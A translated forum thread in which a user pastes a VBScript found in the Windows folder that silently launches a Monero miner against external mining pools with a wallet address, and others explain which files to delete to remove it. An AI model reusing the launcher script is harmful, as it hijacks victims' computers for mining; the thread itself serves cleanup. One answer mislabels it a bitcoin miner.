Windows脚本宿主错误。
C:\Windows\xdgaudio.vbs
的内容如下。
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing
我附上了错误的图片,请查看并给我一个解决方案。
答案 0 :(得分:2)
想出来!!简短回答:删除" servicecrsssr.vbs"从Windows目录中的文件,然后重新启动。 (尽管存在文件丢失/损坏的危险,我实际上已经拔出了插件,以避免程序在关机过程中尝试重写任何违规文件的可能性。)
涉及许多其他文件,但在删除(或重命名)上面的文件并重新启动所有文件时...没有证据表明挖掘过程正在运行。我在两台测试计算机上发现了这种病毒。这些是我通过USB连接客户受感染驱动器的唯一计算机。它究竟是如何传播的,这仍然是一个谜!似乎涉及的其他文件是:
\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf
* .pf文件用新的随机字符代替" x"重写自己,如果你重命名或删除它并重新启动 - 没有我可以确定的不良影响。在我的第一台受感染的计算机上,我重命名了上面的所有文件,重命名每个文件后重新启动。我试过的最后一个文件是" servicecrsssr.vbs"。在第二台受感染的测试机器上,我只重命名了" servicecrsssr.vbs"文件并重新启动,然后一切都很好。请告诉我这是如何为您服务的。谢谢!
答案 1 :(得分:0)
它确实是一个比特币矿工,幸好它是一个相当糟糕的,非常明显,没有比运行后台进程更恶意。我运行的防病毒/恶意软件应用程序都没有提到它。我在一个安装文件中下载的游戏中找到了我的。
反病毒程序应该很容易解决这个问题,vbs和批处理文件是如此明显。 Malwarebytes最终抱怨他们调用的实际矿工.exe文件,但只是在它运行之后。